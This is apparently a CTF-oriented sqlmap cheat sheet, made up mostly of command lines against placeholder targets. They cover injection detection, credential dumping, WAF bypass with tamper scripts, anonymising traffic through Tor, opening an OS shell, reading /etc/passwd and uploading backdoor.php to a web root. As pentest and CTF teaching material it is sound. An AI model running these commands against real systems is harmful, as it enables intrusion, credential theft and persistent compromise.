Superior CTF

1. INTRODUCTION

sqlmap is an automated SQL injection detection and exploitation tool.

It can:

bash

Detect SQL injection

bash

Enumerate databases, tables, users

bash

Dump credentials

bash

Read/write files

bash

Gain OS command execution

Supports MySQL, MSSQL, PostgreSQL, Oracle, SQLite, MariaDB, Firebird, and more.

2. BASIC DETECTION

Test a GET parameter:

bash

sqlmap -u "http://target.com/product?id=1"

Verbose output:

bash

sqlmap -u "http://target.com/item?id=1" -v 3

3. SPECIFYING PARAMETERS

GET request:

bash

sqlmap -u "http://site.com/p?id=1"

POST request:

bash

sqlmap -u "http://site.com/login" --data="user=admin&pass=123"

Cookie injection:

bash

sqlmap -u "http://site.com/" --cookie="PHPSESSID=abc123"

4. LEVEL AND RISK

Higher levels = more aggressive tests.

Risk: 1–3

Level: 1–5

Example:

bash

sqlmap -u URL --risk=3 --level=5

5. ENUMERATING DATABASES

List DBMS databases:

bash

sqlmap -u URL --dbs

List tables:

bash

sqlmap -u URL -D dbname --tables

List columns:

bash

sqlmap -u URL -D dbname -T table --columns

6. DUMPING DATA

Dump entire table:

bash

sqlmap -u URL -D db -T table --dump

Dump specific columns:

bash

sqlmap -u URL -D db -T table -C username,password --dump

7. BYPASSING PROTECTIONS

Change User-Agent:

bash

sqlmap -u URL --user-agent="Mozilla/5.0"

Use tamper scripts:

bash

sqlmap -u URL --tamper=space2comment

Multiple tampers:

bash

sqlmap -u URL --tamper=space2comment,between

8. USING TOR

Route all traffic through Tor:

bash

sqlmap -u URL --tor --tor-type=socks5 --check-tor

9. OS SHELL & FILE OPERATIONS

Interactive OS shell:

bash

sqlmap -u URL --os-shell

Upload file:

bash

sqlmap -u URL --file-write=backdoor.php --file-dest=/var/www/html/backdoor.php

Read file:

bash

sqlmap -u URL --file-read=/etc/passwd

10. ENUMERATING USERS & PRIVILEGES

Enumerate users:

bash

sqlmap -u URL --users

Enumerate passwords:

bash

sqlmap -u URL --passwords

Enumerate privileges:

bash

sqlmap -u URL --privileges

11. BRUTE-FORCING PASSWORDS

Crack hashes:

bash

sqlmap -u URL --passwords --batch

Common table-based cracking:

bash

sqlmap -u URL --passwords --common-tables

12. CRAWLING & AUTOMATION

Automatically crawl website for URLs:

bash

sqlmap -u "http://target.com" --crawl=3

13. USING PROXY

Send traffic through Burp Suite:

bash

sqlmap -u URL --proxy=http://127.0.0.1:8080

14. REAL PENTEST WORKFLOW

1. Detect SQL injection:

bash

sqlmap -u URL

2. Get DB/user info:

bash

sqlmap -u URL --current-db --current-user --dbs

3. Enumerate tables:

bash

sqlmap -u URL -D targetdb --tables

4. Dump credentials:

bash

sqlmap -u URL -D targetdb -T users -C user,hash --dump

5. Crack hashes:

Use hashcat or john

6. Try OS shell:

bash

sqlmap -u URL --os-shell

15. CTF TIPS

Use --batch to skip prompts.

Always try tamper scripts.

Use --dump-all when needed.

Scan multiple parameters:

bash

sqlmap -u URL --forms

SQLMAP — Practical Guide

1. INTRODUCTION

2. BASIC DETECTION

3. SPECIFYING PARAMETERS

4. LEVEL AND RISK

5. ENUMERATING DATABASES

6. DUMPING DATA

7. BYPASSING PROTECTIONS

8. USING TOR

9. OS SHELL & FILE OPERATIONS

10. ENUMERATING USERS & PRIVILEGES

11. BRUTE-FORCING PASSWORDS

12. CRAWLING & AUTOMATION

13. USING PROXY

14. REAL PENTEST WORKFLOW

1. Detect SQL injection:

2. Get DB/user info:

3. Enumerate tables:

4. Dump credentials:

5. Crack hashes:

6. Try OS shell:

15. CTF TIPS